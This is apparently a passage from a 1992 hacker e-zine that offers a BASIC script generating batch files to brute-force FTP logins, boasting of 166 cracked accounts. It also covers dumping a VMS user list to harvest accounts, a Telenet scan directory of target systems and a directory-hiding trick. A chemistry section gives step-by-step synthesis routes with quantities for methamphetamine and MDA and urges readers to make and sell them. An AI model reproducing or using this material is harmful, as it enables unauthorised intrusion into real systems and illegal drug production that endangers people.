using this method, I cracked 166 account on a system in Utah! No shit!
<Title: Multiple Usernames, Multiple Passwords>
5 on error goto 200 ! Handles Them EOF's
10 open "username.dat" for input as#1 ! Opens Username File
open "password.dat" for input as#2 ! Opens Password File
open "hack.bat" for output as#3 ! Our Electro-Hacker Hero
20 flag=1 ! Determines Who Got The
input#1,user$ ! EOF
30 flag=2 ! Determines Who Got The
input#2,pass$ ! EOF
40 input#3,"$ ftp <target address> /user="+user$+" /pass="+pass$
print#3,"quit" ! Try and exit
50 goto 30
200 resume 210
210 if flag=2 then ! If At The End Of Pass
close#2 ! File, Close It, Get
open "password.dat" for input as#2 ! Another User And
goto 20 ! Start Over
220 if flag=1 then ! If At The End A User
close#1 ! File, Close And Exit.
close#2
close#3
end
Okay, that should pretty much cover your needs. There are only
a few drawbacks to FTP Batch Hacker. It sometimes requires a bit of disk
space, so is you have a disk quota of a hundred blocks, forget about it.
I would also like to say that when you actually use this
method, It would be very wise to change the names for the files used by the
programs above. After all, it don't look to cool to have "passhacker.bat" in
the queue for all to see! Yesh!
Before I end this article, I would like to include one more detail
that works really nice with this method. Lets say your on this really nice
VAX/VMS and ya want to keep you access there as long as possible. What you
need is as many accounts as possible. Heres what I do, type the following
at DCL........
Type sys$common:[sysexe]rightslist.dat
This will dump all usernames <And group names to> along with alot of
random <well, random to use> ctrl characters. Capture this, and write a filter
and re-upload the nice clean userlist. After that, run one of these guys with
the user's you got and I can almost bet ya that you will get at least a few
accounts.
This works really great when you use the DECNET to jump on other
systems that are a part of the network! You can Sometimes
crack open a entire cluster <Or two, three, four, etc, etc!>.
Well, thats all there is to it. That simple and fun. Also, if anyone
writes a good filter for rightslist ON a VMS system, I would very much like
to see your code, because I have had one hell of a time getting one to
work myself.......
Note: After producing this article, I found out why the FTP never makes logs
of invalid attempts. The reason is because because most of the time
the people who have setup the system have not went though all the
security means to keep stuff like this from happening. Not to worry
though. I have only seen one system out of about 100 that actually
had there FTP server setup right. The reason that they had it setup
right was because they where FTP hacked so many times by fellow SAOO
members, that they figured it out. Those people are at FSU, so don't
hack on 'em or use this method on 'em. They got enough problems as it
is.
If you do not wish to write your own Rightslist filter, there are
ton of RL filters written by SAOO members. They are Phill <any version
higher than 1.0 for speed>, Written by Dementia Meister and Abigail
Natias, and also RIF <For VAX/VMS, and by far the quickest because
you never need to download the RL file, because it filter's it
online>, which is written in C. Created by Laiazon and Tech advisor -
The Beaver.
<Phill was also included with this issue of Critical Mass!>
<C>1992 ---==<Beaver>==---
______________________________________________
l l
l Generic SAOO Telenet Directory l
l Part II l
l Scanned By The Beaver l
l____________________________________________l
Information on Telenet:
The First thing you need to do is obtain a dialup list. To do
this, call 1-800-424-9494 <1200 7E1, or 1200 8N1 with hit bit
striping on>. Once on, you will receive a "TERMINAL=", which at
this point, enter your terminal type, or just press return <TTY>.
You will now get a "@" prompt. From here type "c mail". At
the "Username?" prompt, enter "phones" and the same for the
"Password?" prompt. At this point, simply follow the directions,
and you will get your local dialup<s>. One thing I would like to
note, when using the 300/1200 dialups, when you connect, simply hit
return a few times. When using the 2400 dialups, you must enter "@"
followed by a carriage return.
For more information on Telenet, I advise you to get
Hacker's Unlimited issue#1 or LOD/H Technical Journal for more
information on Telenet. I did not wish to make this a text file on
Telenet, but rather a directory of listings scanned by myself and
fellow S.A.O.O members.
The "area" that is implied in this list basicly means that is the
overall area that was covered. Just because a machine was found in a scan
in a specific area does not always mean it IS in that area. At the bottom
of the list for "interconnecting" hosts.
Part I consisted of the New York and half the Washington D.C.
area. In this issue is the rest of the D.C. along with 904,
305 and the 404. Please enjoy.
Prefix: 904 <North Florida Area> Scanned: 0-999
Suffix Information O/S
------ -------------------------------------------------------------- ----
163 - Refuse Collect Calls
231 - Refuse Collect Calls
236 - Refuse Collect Calls
237 - Refuse Collect Calls
Prefix: 305 <South Florida Area> Scanned: 0-999
Suffix Information O/S
------ -------------------------------------------------------------- ----
004 - Martin Marietta - SIM3278
022 - INH6.NET.FDP <404 60033>
034 - Martin Marietta Proprietary Network VM
035 - "ENTER SWITCH CHARACTERS" Unknown
059 - ".INVALID COMMAND", VTAM?
105 - Refuse Collect Calls
106 - Refuse Collect Calls
120 - Refuse Collect Calls
121 - Refuse Collect Calls
122 - Refuse Collect Calls
130 - Unknown
135 - Refuse Collect Calls
136 - INH6.NET.FDP <404 60033>
140 - ".INVALID COMMAND" , VTAM?
141 - "Select Desired System:" Server
142 - Telenet PAD
145 - Telenet PAD
149 - S901.net.buc
150 - Refuse Collect Calls
156 - Telenet PAD
162 - Unknown
170 - Refuse Collect Calls
171 - "ENTER SWITCH CHARACTERS"
172 - Unknown
175 - Telenet PAD
177 - Unknown
178 - s901.net.bus
237 - Comcast Information Service VM
241 - Unknown
245 - Refuse Collect Calls
247 - "SEND" Unknown
250 - "aci login:" Unix.
253 - "PACKET/74" SNA, must be IBM
254 - "PACKET/74"
339 - "PACKET/74"
342 - Refuse Collect Calls
347 - "PACKET/74"
362 - Clarion Software On-line Info. Service, type "new" for new user
363 - Clarion Software
364 - Clarion Software
365 - Clarion Software
366 - Clarion Software
370 - Refuse Collect Calls
371 - VAX/VMS in Another Laug! VAX/VMS
372 - Refuse Collect Calls
438 - Refuse Collect Calls
461 - Refuse Collect Calls
463 - Martin Marietta VM
464 - Refuse Collect Calls
465 - Unknown
467 - HP Unix
471 - Unknown
472 - Refuse Collect Calls
566 - Busy At Scan
567 - Busy At Scan
644 - ".INVALID COMMAND"
645 - ".INVALD COMMAND"
Interconnection:
[305136 - 404 60033]
Prefix: 202 <Washington D.C Area> Scanned: 400-999 <See CM#6 for 0-400>
Suffix Information O/S
------ -------------------------------------------------------------- ----
403 - Refuse Collect Calls
433 - Refuse Collect Calls
447 - Access Not Allowed From PAD
448 - Access Not Allowed From PAD
449 - Access Not Allowed From PAD
453 - Telenet PAD
454 - VAX/VMS GBS VAX/VMS
455 - Refuse Collect Calls
456 - Refuse Collect Calls
458 - Refuse Collect Calls
459 - Refuse Collect Calls
462 - Access Not Allowed From PAD
463 - Access Not Allowed From PAD
465 - Refuse Collect Calls
466 - Refuse Collect Calls
467 - Refuse Collect Calls
468 - Refuse Collect Calls
469 - Refuse Collect Calls
472 - Refuse Collect Calls
473 - Access Not Allowed From PAD
474 - Access Not Allowed From PAD
475 - Access Not Allowed From PAD
477 - "UPI>" Unknown
478 - "UPI>" Unknown
479 - "UPI>" Unknown
550 - "UPI>" Unknown
555 - Access Not Allowed From PAD
616 - Refuse Collect Calls
617 - Refuse Collect Calls
652 - Refuse Collect Calls
653 - Refuse Collect Calls
654 - Refuse Collect Calls
810 - Telenet Async to 3270
Prefix: 404 <North Georga Area> Scanned: 0-999
Suffix Information O/S
------ --------------------------------------------------------------- ----
005 - Connects/disconnects with no disconnect msg
022 - Refuse Collect Calls
029 - Telenet PAD?
053 - VTAM Server
057 - Unknown
059 - Unknown
070 - Unknown
077 - Unknown
079 - Unknown
113 - Refuse Collect Calls
114 - Refuse Collect Calls
124 - Access Not Allowed From PAD
127 - Access Not Allowed From PAD
128 - Access Not Allowed From PAD
140 - Access Not Allowed From PAD
141 - Access Not Allowed From PAD
142 - Access Not Allowed From PAD
143 - Unknown
161 - Connect/disconnects
162 - Connect/disconnects
168 - Unknown
171 - "OK" Unknown
244 - Connect/disconnects
247 - Unknown
277 - Connect/disconnects
343 - Access Not Allowed From PAD
344 - Access Not Allowed From PAD
349 - Primenet
351 - Unknown VAX/VMS
352 - Unknown VAX/VMS
358 - "Please login to network U:"
359 - "Please login to network U"
362 - Access Not Allowed From PAD
372 - System/88
373 - System/88
374 - Refuse Collect Calls
375 - "Please login to network U:"
532 - Refuse Collect Calls
556 - Refuse Collect Calls
557 - Refuse Collect Calls
558 - Refuse Collect Calls
559 - Refuse Collect Calls
560 - Unknown VAX/VMS
633 - Unknown VAX/VMS
635 - Unknown VAX/VMS
60033 - INH6.NET.FDP
---------------------------------------------
Hidding Directories
By Dementia Meister
----------------------------------
Here is how to really hide directorys. First off, you need a HEX-Editor,
like DISKEDIT.EXE from Norton Utilities v6.01(the one I recommend). Then
you need a directory that you want to hide. Warning: Play/test this
method out on a floppy first so you do not screw up your HD. I have lost
many of data (my fault, by lack of knowledge). This method is relatively
safe as long as you do not calibrate, speedisk, etc.. your HD. Well back
to the task at hand, go into the HEX-Editor and find your DIR. Now this
is the tricky part. Go to the DIR name and change it to an ext. only,
plus add the HIDDEN attribute to it. Now almost nothing can find your
DIR, not NCD, not DOS, not anything BUT a HEX-Editor that you manually
go and find. To UNHIDE the DIR, you go into the HEX-Editor find the
DIR change it to a legitamate name and wall-la<GRIN> you have it.
ThanX from the EDITOR of this INFO.
-=[ ]). |\|\. ]=-
(Dementia Meister)
Welcome to Down and Dirty Chemistry 101
This file is for those who wish to make drugs in thier own home, to sell
or just to take. Unlike most how to files on dope manufacture, this one is
for people who are more worried about getting dope made than getting it 100%
pure and of pharmacutical quality. These methods are the quickest and most
simple around. You don't need a PhD. to make these compounds, but a little
knowledge of chemistry is a must.
* DISCLAIMER *
This where most people leave a message about how the file is for informa-
tional use only. BULLSHIT, if you are old enough to make these drugs then you
are old enough to decide for yourself if you want to take them or not. I say
go right ahead, make 'em then take 'em. Yea it's illegal, so BE CAREFUL, but
if you aren't going to use this file then why keep it? pass it on to someone
who will, and scam some of thier first batch as an info retrieval fee.
TYRAMINE
Tyramine is a fairly potent stimulant that is found naturally in cheese.
Don't even t
hink about extracting it. It is easily made from the amino acid
tyrosine by decarboxilating it. Tyrosine is rather carefully watched by the
DEA, so don't buy it from a chem. supply comany, no matter how much cheaper
it is there. It is available as the free form amino acid from most any health
food store.
To decarboxilate the tyrosine at home, simply heat it with barium hydroxide
and seperate tyramine from the solution. Tyramine and tyrosine are both only
slighty soluble in water, so filtering with hot water should remove most of
the impurities and leave you with tyramine and unreacted tyrosine. The entire
synthesis could take place in a coffee pot.
* MUSCIMOLE *
This is another drug with a synthesis so easy, it is funny. It is the
active compound in many old world mushrooms, and may well be the first drug
that early man tripped on. I have never tried it, but I heard that it can
cause a few unpleasent effects (muscle twitching, dizziness). It is still
legal in some states and ibotenic acid is fairly sfe to order from a supply
company.
To make muscimole, reflux ibotenic acid in 10 times it's weight of water.
* METHAMPHETAMINE *
Crank, crystal meth, wire: all words known and loved by speed freaks around
the world. This is the mother of all amphetamines, a small line will wire you
for 12 hours. There are many ways to go about making crank, if you have
access to an organic chemistry lab. For those who don't, this may be the
simplest approach. This method uses ephedrine as the main precurser because
it is very similar in structure to crank. Look them both up and see.
All you need to do is replace an OH group with a hydrogen atom.............
No Problem. Ephedrine is available from suppliers in the back of magazines
(Penthouse, Cosmopoliton) for about $20 for 1,000 25mg tablets, just extract
the pure ephedrine out.
Put a 2 liter flask into an ice bath with a stirrer in one neck and at
least one neck to pour chemicals into. Add 360 ml chloroform, then 360 g of
phosphorus pentachloride and stir for 1/2 hour. Then add 240 g of ephedrine
hydrochloride over 45 minutes, put in 60 ml more chloroform, and stir for 2
hours. Let the brew stand in ice for 45 min. and decant the juice off, DON'T
let the left over PCl5 come over, filter if any does. Add mineral spirits
until the total volume is 4 liters, then let the chlorephedrine crystalize
in the freezer for an hour. Filter and dry your crystals.
To make methamphetamine from chlorephadrine you must replace the Cl atom
with a hydrogen. There are many catalysts that will work, zinc is cheap and
easy to get, but gives a rather low yield of speed. Palladium is probably the
best way to go.
Take a champagne bottle, 2L is a good size, and wrap it in duct tape to be
safe. Add 50g anhydrous sodium acetate and 700ml of distilled water. Make a
buffer solution by adding acetic acid until the pH is 7. Add 2g of palladium
, either on charcoal or barium sulfate, then 125g of chlorephadrine. Attach
a cylender of H gas and increase to 30lbs pressure. Keep this pressure up
for several hours, until H stops being absorbed. Stir with magnetic stirer
or if need be just shake it regularly over the whole time.
Decant off the liquid and filter to remove the catalyst. make the solution
strongly basic (pH 10-11) with NaOH and shake like hell for about 5 min.
Extract with Benzene and discard the water layer. Fractional distillation
is required to seperate the chorephadrine from the meth, the meth comes over
first followed immediatly by chlorephadrine.
Palladium black on charcoal is on the DEA watched chemical list, be careful
obtaining it. The Merk index should have a formula for making it. If you go
with the zinc use about twice as many moles as you would with palladium.
*MDA*
Ahh, the origional love drug! This is essentially the same as XTC, but as
it is easier to make and stronger I will give this formula instead.
Safrole is the main precurser and can be obtained in sasafrass oil which
is available at any store that sells herbs, it is about 80% safrole by volume
and pure safrole can be distilled from the oil under a vacuum. When the
distillate appears to be a homogenious oil, collect it in a clean flask, this
is safrole.
In a glass vessel, in an ice bath, slowly add 450g concentrated sulfuric
acid to 400g acetonitrile. Keep the temperature under 10 degrees C while
making the addition. Take the mixture out of the ice bath and add 236g safrole
Stir occasionally and watch the temperature. When the solution reaches 80 deg.
C put the flask back in the ice bath and then pour into a gallon of ice water
with 18 oz NaOH in it. Stir while pouring.
Decante the yellow oily layer on top into another flask. Add 10 times the
volume of 10% KOH in 190 proof vodka. Reflux for 6 hours. Boil away most of
the alcohol under a vacuum. Add water to dissolve the KOH and extract your
dope with benzene. Distill under a vacuum and collect the fraction coming
over at about 125 deg. C (at about 20 torr). Crystallize in your freezer, and
filter. Dry the crystals. One "hit" is about 100mg.
This is all the space and time I have to write. Expect D$DChem II in the
next issue of Critical Mass. If you have any questions or comments you can
reach me on any SAOO support bbs. Address mail to Art Phish. I would be happy
to include any synthesis that is requested in the next issue.
Art Phish
_________________________________________
Closing Notes
__________________________
Welp, that concludes yet another fine issue of Critical Mass. In
issue number 8, perpare yourself for the following......
SAOO Telenet Directory Part III
Hacking The Department Of Motor Vec.
More Chemistry, from Art Phish
Probably a article on Telenet considering the resent questions
I have received.
An much, much more! If you would like to be involved in
computer conference, please leave The Beaver Email at one of the
location given at the beging of this issue of Critical Mass.
Until the next issue, chow... And Happy, Safe! hack'in.
If you have any article pretaining to not so often
talked about subjects, please E-mail the Beaver. Also, after
the writing of "How to take DEC Servers Off the air", there
seemed to be the misconception on why the article was produced.
It seems that some people believed that the article was put
out because I am "a bad person whom only likes destroying data".
This is a pretty far fetched thing to say. Shortly after the
articles release, I heard that a friend of mine at DOR <Dept.
of Revenue> read that part and then secured there server more.
That, my friend, was the purpose of the article. To get information
out there, among the people. Till the next CM, I guess I will
be seeing ya on the nets.... Chow!
---==<Beaver>==---
Member S.A.O.O.
Comments